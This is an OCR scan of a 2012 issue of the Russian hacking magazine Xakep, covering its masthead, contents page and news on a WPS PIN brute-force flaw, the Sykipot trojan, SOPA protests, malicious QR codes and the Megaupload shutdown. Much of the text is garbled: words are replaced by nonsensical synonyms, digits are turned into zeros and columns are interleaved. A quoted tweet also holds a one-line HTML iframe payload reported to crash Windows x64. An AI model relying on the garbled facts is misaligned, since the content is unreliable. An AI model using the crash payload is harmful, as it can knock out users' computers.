Page 0

Исчерпывающий гайд по шоппингу на китайских интернет-магазинах


_.....

-пF.нЕР РЕДАКЦИЯ Главный вычитчик

Никуся (<nikitozz)) Кислицин

Шеф-редактор

Стёпа ((step)) Ильин lstepfareal.xakep.ru ) Николай ((gorl)) Андреев [ gorlumrarea l. xakep . гu l

Выпускающий вычитчик

[nikitoziOreal.xakep ru )

Редакторы рубрик

PC_ZONE равно UNITS

Степуха ((step)) Ильин

хакинг

РR-директор

Маг (maggiOreal.xakep.ru ) Андрей ((Andrushock» Матвеев landrushockiOreal.xakep.ru ] Александр «Dr. Кlouniz» Лозовский lalexanderlё!real.xakeo . ru] Николай <<gогi>>Андреев [gorlumffireal.xakep.ru J Анна Г риrорьева [grigorievafaglc.ru ]

Литературный вычитчик

Леся Болотникова

UNIXOIO да SYN/ACK MALWARE КОДИНГ

DVD Выпускающий вычитчик

Антоня с<аnt>>Жуков

Uniх-раздел Security - paздeл

Андря «Andrushock" Матвеев [andrushockffireal.xakep.ru ) Дмитрий «01g1 >>Евдокимов

Монтаж видео

Максимка Трубицын

(antrareal xakep.ru ]

ART Арт-директор

Алик Вайнер 0~1

Дизайнер

земледелец Пономарев

Верстальщик

Руся Светлых

Иллюстрация бери обложке

Санюша Брички н

PUBLISHING Учредитель

000 «Г ей м Лэнд>>, 015280, Москва, 5 этаж, контора N<> 01. Т ел.: (4951935-7034, факс: (4951545-0906

у л. Ленинская Слобода, 09, Омега nлаза,

ПРИВЕТ С АНТАРКТИДЫ

Генеральныйдиректор

Димаша Агарунов

Генеральный владелец

Андрейка Михайлюк

Финансовый заведующий

храбрый Фатеркин

Директор по части маркетингу

Леся Каркашадзе

Управляющий арт ·директор

Алик Вайнер

Главныйдизайнер

Энди Тернбулл

Директор за nроизводству

Гуля Кучерявый

РАЗМЕЩЕНИЕ РЕКЛАМЫ

Две недели отступать получил особенное электронное письмо, которое меняпо-хорошемутронуло равным образом заставило погрузиться в раздумье относительно вечном. Писал

Т ел.: (4951935-7034, факс: (4951545 -0906

РЕКЛАМНЫЙ ОТДЕЛ

СерегаСильнов-редактор рубрики «Фри кинг >>, какой уже

Директор груnnы TECHNOLOGY

на прошлом годуотправился на научную экспедицию вднтактиду.

Старшие менеджеры

Письмо получается особенны м, вследствие этого зачем отправлено только аюшки? не не без; южного полюса равно передано по части коротковолновой блат со скоростью бод при помощи

-50 неком мерческую радиолюбительскую ахан Wl NLl NK.

В письме Сергий передавал приветы равным образом рассказывал по отношению своих впе­ чатлениях , которые во таком необычном месте рождаются ото самых простых вещей.

Менеджер Директор корпоративной группы Старший менеджер Менеджер Старший трафик·менеджер

Маруся Филатова (filatovaiOglc.гu l Ольга Емельянцева ( olgaemiiOglc . гu l Оксана Алехина falekhinaraglc.rul Елена Поликарпова ( polika r povalё!glc.ru ) [работа вместе с рекламными агентствами] Кристина Т атаренкова [tatarenkovafOglc.ru ] Юлия Г ос подинова f gospoфnova fOglc . ru ] Мария Дубровская (dubгovskayaiOglc гu l Марья Буланова [ bulanovaГclglc:.ru )

ОТДЕЛРЕАЛИЭАЦИИСПЕЦПРОЕКТОВ

Впрочем, весь каста романтика была чуть сопутствующей вещью про

Директор

Лександр Коренфельд l koгenfeldiOglc. гu l

Сергея, тогда некто приехал тама во составе экспедиции, которая должна

Менеджеры

Светуля Мюллер Наталия Тулинова

была пробурить 0 068 метров льда равно обязательно дотян уться до подледного озера Восток, малограмотный навредив ему. Озеро действитель­

РАСПРОСТРАНЕНИЕ

однако огромное:

Директор по мнению дистрибуции

Кошелева Татьянка

Руководитель отдела nодпис ки

Клепикова Викторка Oepikovalё!glc. ru )

050 километров

на длину, 00-в ширин у, равным образом по 0.2-в

глубину. Учи тывая , что-нибудь оно было изолировано с внешнего мира сотни тысяч лет, вопросы об обитающих во этом озере формах жизни и в отношении том, почто не выделяя частностей в дальнейшем происходит, -ч ертовски интересны: до­ стоверно об этом человечеству шиш никак не секрет полишинеля . Не приближенно быстро бессчётно

осталось в планетенеизученных уголков,- равно во водоем Восток являетсяоднимиэтаких объектов.

Какова но была моя радость, когда-никогда теперь [5 февраля) моя особа прочел но­

[koshelevalaglc.ru l

Руководитель

Лукичева Наталья Hukichevafaglc.ru ]

спецрасnространен да аз многогрешный

Претензии равно дополнительная ан фа: В случае возникновения вопросов по мнению качеству печати равным образом ОVО-дисков: claimlё!glc.ru . Горячая контур объединение подnиске

Факсдля отправки купонов да квитанций нате новые подписки:

[495] 045-09-06

Телефон отдела подnискидля жителей Москвы: [495) 063-82-77 Т елефон с целью жителей регионов равным образом на звонков вместе с мобильных телефонов: 0-800-200-3-999

вость касательно том, почто российская поездка достигла усик пе ха идоб урила

Дnя nисем:

эту скважину, реализовав проект, длившийся побольше

Зарегистрировано во Министерстве Российской Федерации объединение делам nечати, телерадиовещанию

00 лет! Чертов­

ски горд вслед Сергея да его коллег-российских ученых, работающих в этой экспедиции равным образом решившихтакую сложную задачу! Выполняю

его просьбу: передаю хелло во всех отношениях читателям Х от Антарктиды : ).

001000, Москва, Главnочтамт, а/я 052, Хакер

да средствам массовых коммуникаций ПИЯ Отпечатано во тиnографии

07-11802

ото 04.02.2002.

Scanweb, Финляндия. Т да неистовство 019 033 экземпляров.

Мнение редакции отнюдь не кровь из носу совпадаете мнением авторов. Все материалы во номере

P.S.

Сергиян обещал произвести фотографию вместе с вытоптанным во снегу

держи фоне полярной станции логотипом Хакера. Ждем его возвра­

щения:).

предоставляются во вкусе уведомление ко размышлению. Лица, использующиеданную информацию в nротивозаконных целях, могут присутствовать nривлечены для ответственности. Редакция безграмотный слабит ответ­ ственности после интенция рекламных объявлений во номере.За nереnечатку наших материалов без спроса- nреследуем.

По воnросам лицензирования да nолучения nрав получай приложение редакционных материалов

nikitozz, rn. ре д. Х shop.glc.ru/xakep vkontakte.ru/xakep mag

ХАКЕР

03/158/2012

журнала обращайтесь сообразно адресу: contentragtc.ru .

© 000 «ГеймЛзнд», РФ, 0012

001


Content MEGANEWS

016

Колонка Степы Ильинна

017

Proof-of-concept

О хранении паралей

Все новое вслед за свежий месяцочек

011

hacker tweets Хак-сценавтви ттер е

РЕГУЛЯРНО ПОЛЬЗУЮТСЯ

008

HEADER 004

0АМИЛЛИНОВАМЕРИКАНЦЕВ

ТЕХНОЛОГИЕЙ ОR-КОДОВ

За дач а: снарядить интересные показатели не без; PasteЬin . com

COVERSTORY

030

Большая охота Интервью от ведущим хед­ хантером рунета

COVERSTORY

COVERSTORY

018

02,

Ломаем Wi-Fi

Расщепляй равным образом

после

властвуй

00 часов Получаем WPAключ для того Wi-Fi не без;

Уязвимости рас-

через уязви-

са да внедрения

муж технологии

заголовков во со-

WPS

временном вебе

щепления следовать ошибаться


048

038

PCZONE

-

UNIXOID

В небесная империя ради покупками?

004

Свободачерезизоляцию

008

Федоринасча ст ье

Из а состоят безопасные Liпuх - дистрибутивы

Семь китайских интернет-магазинов со всякой всячиной

042

Проверка для основательность

Мини-обзор заслуживаю щ их внимания изме н е н ий

Тестируем универсальную распознавалку САР Т СНА

048

Фреймворкдля пентестера

во последних версиях F edoгa

Тестируем надёжность веб-приложения со через

01 О

wЗaf

052

Интегрируем Liпux равным образом <<облачные» сервисы

хакинг

-

SYN/ACK

Easy-Hack

014

В поискахинсайдера

020

Корпоративныесвязи

Борьба из утечками корпоративной информа ц ии

Хакерекие секреты простых вещей

056

Достучаться впредь до небес

Обзорэксплоитов

Анализ свеженькихуязвимсетей

Опенсорсные решения в целях централизованного

062

РНР - ботик ради

управления доступом ко ресурсам

066

0сап сгасk it!

Создаем высокопроизводительный сайт

Решение заданий для того хак-конкурса, учрежденного

не без; использованием

Windows

Кодим бота интересах распределенных вычислений

024

Испытаниенагрузкой

nginx да Django

Управлением правительстве н утнапиштим рычаги

Великобритании

070

Фальшивые

SMS: похудей вслед 00 дней!

Всяподного т ная известноголохетро н а

074

X-Too ls

-

FERRUM

030

От <<винта » ! Тестирование внешних жесткихдисков вместе с

Программы про взлома

036

Ed i f i eг

WEXLER.BOOKТ7055

USB 0.0

R2500

Обзор универсальной активной стереосистемы

-

MALWARE

038

076

Веселая тройкабуткитов

-

И шве ц , да жнец, да держи дуде игрец от ц ве т ным

Самыетехнологичные угрозы

0011

лета

на веселых картинках

082

Малварьдля мобильных << окошек »

Исследуем фасон безопасности п опулярной ОС д лясмартфоновнапрактике

КОДИНГ 088

Формграббердля

FAQUNIТED

043

Диско

044

0.5 Гб всякой WWW2

Google Chгome

Расширяем внутренние резервы препроцессора С/С++ с помощ ь ю сторо н него кодегенератора

096

0адачинасобеседованиях П одборкаинтересныхзаданий,которыедают на собеседованиях

000

Паттерны проектирования <<Адаптер» да «Фасад» Меняем равно н терфейсы классов лишенный чего ущерба интересах з д оровья

Большой

FAQ всячины

Удобные wеЬ-сервисы

равно манера их перехвата на спринклер ре с Google И целого Си скудно

юниты

040

Исследуем отправку зашифрованных форм

094

сенсор н ым дисплеем

010

0.0


MEGANEWS НОВАЯ ДЫРКА В WPS ОБЛЕГЧАЕТЗАДАЧУХАКЕРАМ БРУТФОРСИМ ЛЕГКО И БЫСТРО

GOOGLE ОБВИНЯЮТ В НАРУШЕНИИ ШЕСТИ ПАТЕНТОВ. Истцом выстуnает Bг i t i sh

Telecom -одна изо круnне й ших на мире телекоммуникационных комnаний.

ТРОЯ Н ОХОТИТСЯ НА С МАРТ-КАРТЫ ВОЕННЫХ МАЛВАРЬ, ИСПОЛЬЗОВАВШАЯСЯ ДЛЯ АРТ -АТАК,

н

еприя т нуюуязвимостьна­

шел во из т андарте

СМЕНИЛА ПРОФИЛЬ

WPS [Wi- Fi

Pгotected Setupl исследо­

ватель во области информационной безопасности Стефан В равно бок, что касается чем и поспе ш да л уве д омить U S-CERТ. Д ырка присутствует во продуктах мно­ гих популярных брендов, во книга числе

0-Link, Netgeaг, Linksys равно Buffalo. Она позволяет ощутимо выгнать время,

уходящее для брутфорс РIN-кода, который необходим пользу кого установки беспроводного роутера. В результате о ш ибки ко атакующему возвращается слишком бессчетно информации об РIN­ коде, а самопроизвольно возлюбленный становится слабее, что безграмотный г ативно влияет в защиту

тысяч, разве малограмотный миллионов

Wi-Fi-

ма ршр у т изаторов равно точек дост упа.

В

а

US-C ERT поясняют: «Если

nроверка

D

троянце

Sykipot, казалось бы,

не имеется ни аза особен­

ного- малварь, ориен т ирова нн ая сверху п охищение

данных касательно смарт-картах, малограмотный нова . Но никак не кажинный

деньувидишь малварь, расчёт которой - смарт-карты

сотрудников Министерства обороны С Ш А да п олучение с их помо щ ьюнесанкционированного д оступа ко по части г ра­

ниченным ресурсам. Именно т акие модификации во коде

по части д линности РIN-кода завершилась

Sykipot обнаружили специалисты

неуда ч но, знак доступа посылает

Одна с новых функций троянца обеспечи на ает взаимо­

сообще н ие

выходка со ПО

EA P-NACK н азад клиенту.

компании

Activ ldentity ActivC ii ent,

AlienVault.

для ото орое в духе однова

Эти сведения пересылают ся таким

работает со смарт-картами, соо т ветс т вующими ста н дар­

образом,чтохакеруудаетсяопреде­

тама безопаснос т да Минобороны С Ш А. В американском

лить, является ли первая супруг

Минобороны такие карточки использую т ся интересах хранения

РI N - ко д а на ер н ой. Пос л едняя число

цифровых сертификатов рабо т ников равным образом их РI N-ко д в отношении во , nри­

Отметим, аюшки? ни единовластно

сейчас известна, круглым счетом на правах симпатия являет-

ме н яемыхдля аутентификации. В резул ьт атетехнического

изо производителей,

ся кон т рольной суммой РIN-кода.

анализа специалистам

В се сие зна ч ительно сокращает

недавний проект стих скомпи л ирован е щ е во марте

мости, безвыгодный выпустил

количес т закачаешься п опыток, требуемыхдля

а некто по этих пор был никак не чрезвычайно свободно распространен.

ее правка .

усnеш н ого брутфорса: в отношении н в рассуждении снижается

Он горазд перехватыватьданные что касается сер т ификатах равно п ри

провизия которых подвержены уязви­

В своей статье Вибок пишет, ась? лучшим

из

способом борьбы

сяч>>. По д робнее об этом твоя милость можешь

димых РIN-кодах. После перехвата

п рочи т ать во одной изо статей рубрики

краденую информацию н а защищенные р есурсы во Китае.

со дыркой получи данный моментявляется

отключениеWРS .

00'8 д касательно 00'3 + 00'4, ведь принимать накануне 01 ты­

AlienVault посчастливилось на ыяснить, что 2011 года,

Соvе г Stогуэтого н омера.

помощи во строенного кейло г гера стаскивать дан н ые относительно во на о­

Sykipot переправляет

Э т о, на п рочем, н е говорит в отношении т ом, аюшки? сообразно л у ч атели безусловно н ных тоже находятся во КНР.

@wЗ bdЗvil

<iframe height='18082563'></i causes а BSoD on \vi.n 0 х64 via

Lol!

Yota КОМПАНИЯ <<СКАРТЕЛ>>

ПОРТЫ СТАНДАРТАUSВЗ.О

ПРОИЗВОДИТЕЛЬ LINUX-

СКОРО, наконец, nоявятся

ДИСТРИБУТИВАМАNDRIVА,

WINDOWSPHONE MARKETPLACE nерешагнул

KOMAHДAIPHONE DEV-ТЕАМ,

(БРЕНД УОТА) ЗАПУСТИЛА В НОВОСИБИРСКЕ nервую

в смартфонах равно nланше-

контролируемый российским

отметкув50тысячnри-

джейлбрейк nод iOS 0.01 пользу кого

вентерь

LTE на России . Сейчас

тах.ПоинформациисСЕS,

фондом

ложений. На сие магазину

iPhone45 да iPad 0. За nервые

трал включает6З базовые

nроизойдет сие на конце 0012-

обнародовать касательно банкротстве.

nонадобилось14месяцев

тридняутилитускачало

станции, а ко марту их сделано

го либо — либо во начале 0013 года.

Увы, состояние у комnании капли

(Andгoid Maгket во свое минута

сильнее одного миллиона

nлохи .

nотребовалось 09).

личность .

станет150.

001,

NGI, спешно может

наконец-то, выnустила

ХАКЕР

03 /158/ 0012


...;;; N

N

..; ш

u u

~

0-

=il

:J: а..

по отношению

LO

u :..: < :!Е

х

LO

:!Е L-

:J: ш

:..: :s: а..

LO

~

:J: ш

01ш

а..

~ :s: u

< :!Е ~ :!Е

ш ш а..

:!Е

ш

а а..

0:J:

в рассуждении

:..:

g 1:: о

:J: ш

с:

011

относительно

0-

е

. м

:s:

Реклама . Товар произведен на соответствии от Техническим Регламентом нате табачную продукцию.

~~dдr~~~~~r~d~~т~~ r~~~~~ ~rrд~~rrжд~rт:

~ ~rt~~t ~rtд~т ~~шtм~ dд~r~~ью


MEGANEWS

03% МИРОВОГО ОБЪЕМА ВЫПУСКА ФЛЭШ-ПАМЯТИ NAND скупила на четвертом квартале прошлого годы Apple.

ПЛАНШЕТ, ПРИСТАВКА ИЛИ ЧТО-ТО ДРУГОЕ? СМЕЛЫЙ КОНЦЕПТ ОТ RAZER

nредварительно озвученыследую­ щиетехнические ха­

рактеристики : морда

размером 00,1дюйма

да разрешением 0280 х 800 пикселей , много­ канальнаязвуковая

подсистема Dolby

0.11п роектируемая вместесТНХI. сред­ ства беспроводного подключения

Wi-Fi802.11b/g/n и Bluetooth 0.0. Планиру ется вот и все

РАССМОТРЕНИЕSОРА И РIРАОТЛОЖЕНО О МАСШТАБНОЙ ОНЛАЙНОВОЙ АКЦИИ ПРОТЕСТА И ЕЕ РЕЗУЛЬТАТАХ

m

ы ранее рассказывали в отношении «чудесны х» американских

зако н об nр оектах SOPA IStop Online Р iгасу Act] да

PIPA IPROTECT lntellectual Р горегtу Act], nородивших

волну негодования безграмотный только лишь получи Заnаде, так по мнению по всем статьям у миру. Для

тех. ктоумудрился постоянно для nустить. напоминаем: зако нопро ­

екты обязывают всех у ч астни засада се ти сеть lпровай деры, хос тинги , п оиско вам е вместе с равным образом из темы равно пр.] объединение первомутребованию правообладателя !без решения суда] прочь пиратский контент равным образом прекращатьлюбые вза имоотно шения со nират­

использоватьаксе­

екими сер на исам и. Платежные системы обязаны отключить

лерометры да сенсор­

во озможность перев хвала д е н е г, поисковики -удалить ссылки

ный кинематография .

держи сайты да т. д . В случае невыполнения эт ихтребований ты считаешься соучастником равно твой сайт могуттакже закрыть без свида да следствия. Кстати, иностранные сайты, сервера

которых расположены во США. будут пахнуть такую а ответ­ ственность вслед конспираторский контент, наравне если бы бы они бы ли учреждены во Штат ах. Б олее входя во все подробности со законо nроектами и их возможными последствиями допускается посмотреть хо тя

бы во В икипедии, а нас этот время более интересуют n осле д ­ ствия. П оняв, что такое? «СО ПАблизка », крупные американские

корnорации ощу т или — или угрозу для того себя любимых . За дра ко­ новские мероприятия выступили, для притча у, М РАА, RIAA да альянс BSA !членами которого являются Microsoft, Apple, Adobe, lпt el да т. д.]. Зато визави выеказались Google. Twitteг, Mozi lla, Facebook, Yahoo, еВ тю-тю да дру гие представители интернет­

на

м ериканекая братия Rаzегхорошо известна изумительный по всем статьям мире !в томишко чис­

индустрии. Чем ближе становился « деньХ », получи который-нибудь было

ле равным образом во России] вроде поставщик периферийных игровых устройств

запланированор мастер своего дела смотре ние зако нопроектов на Конгресс~

равно принадлежностей. И нужно заметить, хороших- непостоянно моя особа п ишу эту но­

тем значительнее накаляли вместе с ь со тра сти. В осемна дцат ого января

вость, моя длань что единовременно лежит для мышке от былоувидеть

Project Fiоnа-проект,

Razer. Тем

интереснее да неожиданнее

по-над которым на комnании работаютсейчас

равно кто был nредставлен получай выставке

CES 0012.

Эта концеnция nредставляет

на интернете прошла, пожалуй, самая массовая онлайновая акция протеста ради безвыездно промежуток времени его су ществования. Англоя­ зычная Википедия nровела самый глубокий во истории

из себя игровой nланшет, ориентированный держи игры, получи и распишись иболее nоnулярные сей­

опрос, nодавляющее значительная участников ко ведь рого

часочек держи ПК. так питаться получи и распишись зрелище <<nрожорливые>> равным образом мощ ные . Ус т ройство nланируется

поддержало разъединение англоязычного раздела получи су тки

снастить «интуитивными элементами уnравления» !кнопками да аналоговыми

во отличие протеста.

джойстиками] от насильственный обратной связью. Где как равным образом по образу они будут расnоло ­

свойлоготип черным прямоугольником цензуры . Поддержа­

жены, мирово видимое дело сверху иллюстрации. А гла вн ое, основой Pгoject

ли протести во WoгdPгess. В целом для задел протеста Ыackout

начинать nроцессор lпtel Соге

примкнулитысячи сайтов объединение всему миру. Н еспадко пришло сь

не без; нехваткой игр чтобы планшета- задумка заключается во том, который фактически всегда

равным образом сторонникам SOPA. Та к. виднейший во мире регистратор GoDaddy, nоддерживавший SOPA, подвергся жес т комубой­

Fi ona должен i7 третьего поколения. Заявлено, зачем объединение этому вопро­ су братия убористо сотрудничаете lntel. Этот ходдолжен устрани т ь проблему

Reddit приостановил работу. Google прикрыл

существующие зрелище смогут подвизаться в устройстве минус какой-либо nеределки

котуса сторо ны интернет-сообщества: пользователи приня­

иначе говоря доработки. Ты скаже ш ь. чт что до этотолько концепт. равно будешь малограмотный прав. Специа­

ли сь тысячами у провожать со вои домены ото GoDaddy. Регистратор

листы Rаzегпочти готовы продемонстрировать работающие образцы. Предполагается, ась?

оцени л ситуацию равно поспешил отказатьс ваш покорнейший слуга отсвоих слов,

поставки устройства начнутся уж на четвертом квартале текущего года. Стоить

хотя согласно зже на собеседование TechCrunch шея не без; нил ось. зачем

планшет полагается малограмотный сильнее $1000.

nо-nрежнему поддерживаетSОРА ... В общем , отт ок здание е нов

GoDadd y

продол жается равно сейчас. Сдался nоддавлением народного негодования равным образом союз

ВЗЛОМАН КРУПНЕЙШИЙ ОБУВНОЙ ИНТЕРНЕТ-МАГАЗИН В США.

BSA, заявивший , что-то SOPA «требует доработки ». П отом, уловив тенденцию. «пере д лоб широк разве » да сенаторы, ратовавшие

из-за а нт ипиратские законоnроекты. В осем ь американских

законо дате л ейотк а следовать лись п оддерживать SOPA nосле

08

ZAPPOS.COM УВЕДОМИЛ 0' МЛН

января равно Ыackout'a, некоторые люди да ни капельки встали бери сторону

КЛИЕНТОВ О ТОМ, ЧТО БД МА­ ГАЗИНА ВЗЛОМАНА И ИНФОР­ МАЦИЯ О НИХ МОГЛА ПОПАСТЬ В РУКИ ХАКЕРОВ

первично nр е дставивший законоnроектSО РА . отозвал его,

006

протестующих. И зачем на равно т оге? Конгрессмен Ламар Смит, из­ при знав, аюшки? на нынешнем виде начало малограмотный можетбыть принят.

Рассмотрение зако н оnроек та было отложено.

PIPA nо­

сти гла та а участь. Можно ли получи з вать сие nобедой ? Вряд ли. Л оббисты да копирасты рассержены, н что до останав лива ться они несобираются,полагая,чтосенаторов«затерроризировала бло г осфера». Теперьлоббист ы намере ны крошку nересмо­

третья часть n в отношении д процессия ко пробл еме. Звучит зловеще.

ХАКЕР

03/158/2012


0 ФИШЕК

BUFFALO CLOUDSTATION Собственный облачный сервер Buffalo CloudStation- сие не NAS. Хранилище

освященный традицией

Удобный бэкап Традиционно чтобы решений

nросто

nозволяет

подумаешь формировать периферийный дост уn ко

данным посредством сеть nрактически от любых

Производительная

устройств: наравне со стационарного комnьютера,

форма

приближенно да не без; мобильных девайсов.

Buffalo

бэкаn данных от клиентских машин

Несмотря получи и распишись комnактные размеры

орагниэовывается ахти nросто. При

[15Dx175x45 ммl , сетевое кладовая

этом nоддерживается как так да МАС

05.

Windows,

оснащено достаточно nрои зводитель­

Ус тро йство nоль-

ным а л езом, которое nозволяет далеко не

ностью совместимо от эnnловской технологией

всего-навсего основать проворный сете­ вой достуn ко файлам, хотя равным образом реализо-

Time Machine.

вать кое-кто nолезные функции.

Встроенный

Припожения дпя

BitTorrent-клиeнт

iOS да Android Приложение

Webaccess

Как да относительная современных NAS'oв,

соз­

Buffa lo

оснащен встро­

дадено интересах удаленного дост у nа

CloudStation

вместе с мобильных усище тр ойств ко дан­

ен ным ВitТоггеnt-клиентом со

ным, хранящИмся нате решениях

удобным wеЬ-интерфейсом.

фирмы

Эту функцию сообразно достоинству

Bu ffalo.

Одновременно

nоддерживается порядком

оценят любители интенсивно­

хра нилищ, а само nриложение

го р2р-обмена: раскачивать торрен­

умее т трудиться со файлами на сех nоnулярных форматов: через ви­ део, фотографий равным образом музыки до раз ноформатны х д окументов.

твоя милость достанет во разы удобней.

Перекодировка

Большой границы

медиафайлов

да энергоэффективность

Bu ffalo CloudStation

умеет автомобиль -

матически кодировать вполне виде­ оконтент на нужном размере nри

удаленном достуnе не без; мобильных устройств. Та ким образом, можно удобно смотреть, наnример, видео возьми айфоне, отнюдь не задумываясь

в отношении nерекодировке файлов.

Устройство nозволяет разместить в себя сам диск от

0 давно 0 Тб.

SATA-11

объемом

Среднее энерго­

n отребление nри этом малограмотный если т nревышать

06

Вт. При текущих

расценках получи и распишись э лектроэнергию , на

годок сие nозволяет считать каждую копейку поперед

0

тысяч рублей, если бы уравнивать с обычным ПК .

ХАКЕР

03/158/2012

007


MEGANEWS

ИНДОНЕЗИЙСКИЙ ХАКЕР HMEI7 дефейснул разом полдюжины доменов верхнего уровня , принадлежащих компании S i emeпs.

QR-КОДЫ МОГУТ БЫТЬ ОПАСНЫ

MEGAUPLOAD

КИБЕРПРЕСТУПНИКАМ ТОЖЕ НРАВЯТСЯ НОВЫЕ ТЕХНОЛОГИИ

ФБРЗАКРЫЛООДИН ИЗ КРУПНЕЙШИХ ФАЙЛООБМЕННИКОВ

об

ВСЕ

пасный случай создан на С Ш А-ФБР закрыло

единовластно с крупнейших Файлаобменников на яма

Megaupload, генерировавший, no его собствен­ 4% всего делов интернет-трафика. Похоже

ным данным, вблизи

n

держи аншлаг <<желтой>> новости , но, увы, сие реальность.

рактически целое интересныетехнологические новинки раным-ранешенько тож шапочный разбор оказываются «на служ­

По запросу американских спецслужб на Н овой Зеландии

бе» у криминала. Н е избежали этой участи да

в свою очередь были арестованы первостроитель nроекта Ким

QR-

продаж смартфонов , планшетов равным образом других мобильных

ное умозаключение

девайсов.

чество,

Специалисты

Dotcom

Шмитц равным образом уже три человека. Каждому с них грозиттюрем­

коды,популярностькоторыхрастетвместесувеличением

Websense ThгeatSeekeг Netwoгk об­

no трем обвинениям: 00 полет следовать мошенни­ 20 полет вслед отмыв денег равным образом до пяточек планирование ради весь круг

происшествие нарушения копирайта! Помимо этого, выдвинуты

обвинения nротив трех граждан других стран. Эти народ

наружили сп а м-сообщения, ссылающиеся сверху страницы со вс т роенными QR-кодам и. П в рассуждении всей во идимости, беспричинно вместе с па­

имели пропорция ко проектам компании. П об мнению

распоряжения обходят спам-фильтры равно пытаются принудить nоль­

Де n артамента юстиции С Ш А,

зователей отворять ссылки в частности со через мобиль­

распространению пиратского контента . За высшая отметка планирование рабо­

ных устройств. Сп а м выглядит в качестве кого традиционная брандмауэр

твоя милость спирт как нанес индустрии развлечений потеря во раз­

фар да мы от тобой да содержитссылку для сайт 0tag .nl -

мере $500 млн на виде недоnолученной прибыли . Кроме

во полне легаль­

ный сервис, позволяющий организовывать QR - ко д ы к

того, файлаобменник породил <<криминальные денежные

URL-

потоки>> !от рекламы равно продажи премиум-аккаунтовl насумму$175м л н.

aдpecoв. Как лишь абонент перехо д да т п в отношении ссылке,

получай экране отображается QR-код, а сnрава через него - адрес. Когда nользователь считывает QR-код, его устройство либо автоматично nереходит no зашифрованному адре­

су, либо сnрашиваету юзера отчётливость lв зависимости от версии QR-читалкиl . Эту сторона ле г ко позволяется ис­ пользовать пользу кого распространения специфич н ой малвари

вследствие уязвимостивмобильных браузерах : тем неграмотный менее обы ч но эти коды сканируют то-то и есть не без; через смартфонов . Увы, этот «виток эволюции>> на атаках получи мобильные девайсы предсказывали многие аналитики.

Megaupload сnособствовал

а

Уже nоследовала ответ других ресурсов не без; аналогич­

Поданным для омпа­ ни ис оm5соге , 04 м лн амери для анцев

на возрасте через

08

ным функционалом : для nримеру, именитый хостинг-сервис

FileSonic объявил в отношении полном

отключении файлаобменного

накануне З4л е тр е гулярно

функцианала !составляющего, заметим, его суть) : пока что

используют

перекачивать контент, сильнозагруженный другими nользователя­

домашние мобильные

у вместе с т ро й ства дл я чтен да моя персона QR -к одов . А так-таки ещ е недавно QR- для оды были по­ пулярн ы во осно вн насчёт м

н а Восто ке.

ми, невозможно.

Отреагировала да «сетевая оппозиция>>-Апоnуmоus атаковали сайты ФБР, Минюста США , Белого дома,

RIAA,

М РАА равно заряд прочих организаций, за действий которых был закрыт файлаобменный сервис.

THUNDERBOLTтм

оов

ИНТЕРФЕЙСТНUNDЕRВОLТСКОРОДОБЕРЕТСЯДОПК

РЯДНЕБОЛЬШИХКОММЕРЧЕ­

ANDROIDINVASIONCOCCЫЛKOЙ

HAБAЗEWINDOWS. Этy радостную весточка сообщаетнам

СКИХ IPV6-CETEЙ пла ниру­

НАПРОГРАММИСТАGООGLЕСО­

выход из печати DigiTime. По информации источника (данные по части ко­

ется устроить на Китае

ОБЩАЕТ, аюшки? Googl e во от кором

тором никак не раскрываются) , шеренга << железных » гигантов, таких

для концу201 0 года. А ранее

будущем м ожет начить ваша сестра ­

какSопу, Asus, Gigabyte Technologyи ASRock, сделано динамично

во

старт м обильны х n р оце со сорав

внедряетТhundегЬоlt во домашние nродукты. Новое крица

во Поднебесной стандартным

nод со обственнымтов а рны м

должен где раки зимуют перед рынка на апрелетекущего возраст .

nрото для олом .

з нако м.

0015 году 0Рv6должен останавливаться

ХА КЕ Р

03 / 058/2012


итоги

IGRDUPiB

КОНКУРСА НАСТАЛО ВРЕМЯ ПОДВЕДЕНИЯ ИТОГОВ НАШЕГО КОНКУРСА, КОТОРЫЙ МЫ ПРОВОДИЛИ СОВМЕСТНО С КОМПАНИЕЙ GROUP-IB, СПЕЦИАЛИЭИРУЮЩЕЙСЯ НА РАССЛЕДОВАНИИ ИНЦИДЕНТОВ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ. Напомним, во рамках соревнования было нельзя не сопроводить обнаружение вмиг двух !Т-инцидентов: утечки конфиденциальных данных для предприятии, а таково а взлома сервера нате базе Liпux.

Победителями конкурса являются [в алфавитном порядке):

КОНСТАНТИН ИЛЬИН

~Еонид WАнин

ст дент 0 курса Физико-технического

Род занятий:

У

института

НТУУ "Киевский политех-

нический институт", Киев.

Комментарии nобедитеnя:

«Конку рс понравился, провед

е н возьми высоком техниче­

шил позже связи

не без; комок ~ровне. Прдинятdь уч~~:~и~~сь хорошее впечатле­ с фреимворком

танцевальный шаг пе,

ние относительно квалификации организаторов».

К сожале нию, обе щанный награда [трудоустройство во

Отчеты победителей

Group-IBI невыгодный подошел ни одному изо победителей:

опубликованы получи и распишись нашем сайте:

Костюня учится во Киеве да в эту пору невыгодный может раздавить

www. xakep.ru/post/58241 0

на Москву, а Леонида сполна усище траивает равно текущее место работы . Тем невыгодный менее, в надежде по сию пору было честно, пишущий сии строки

награждаем победителей ценными призами: каждый получает объединение

iPad 0 Wi-Fi

ЗG

06Gb.

Будь не без; нами! Стань одним изо нас!


MEGANEWS

FАСЕВООКВЫПУСТИЛ СО6СТВЕННЫЙ МЕССЕДЖЕР для того Windows, а ВКонтактетем временем те не без; тируетсерв равным образом вместе с видеозвонков

ДВАДЦАТЬ СЕМЬ СТЕКЛЯННЫХДЮЙМОВ НОВИНКА ОТ SAMSUNG НА РLS·МАТРИЦЕ

н

а прошед ш ей далеко не д авно во Лас-Вегасе выставке

СЕ5

0012 приманка

последние разработки продемон ­

стрировали топо на ые производители <<железа»

со лишь мира. Интересного держи СЕ5было много, хотя пере­ числить весь мы, ко сожалению, безвыгодный имеем возможности, приблизительно

который придется ограничиться малы м. Одной с самых ярких новинок, пре д ставлен н ых сверху выставке, стал мони т вопль

027В970 по отношению т компании 0amsuпg, продолжающий 0-ю премиум - серию. Этот 07-дюймовый конструкция интересен

тем , сколько спирт работает в основе технологии PL5 IPiaпe L iпe 5witchingl. П в рассуждении сути, сие модель IP5 lln-Piane 0witchingl oт5amsung . Так вроде I Р5-матрицы бери сей момент являются <<вершиной провиантский цепи», сия старая-новая т ехноло г ия заи н тересовала многих.

П ервый блинчик

y5amsung,

однако, вышел комом: двушник мо­

нитора нате РL5-матрице, представленные на прошлом году, обладали букетом всех возможныхдефектов сборки, были помещены на тулово изо д овольнодешевого пластичность да во

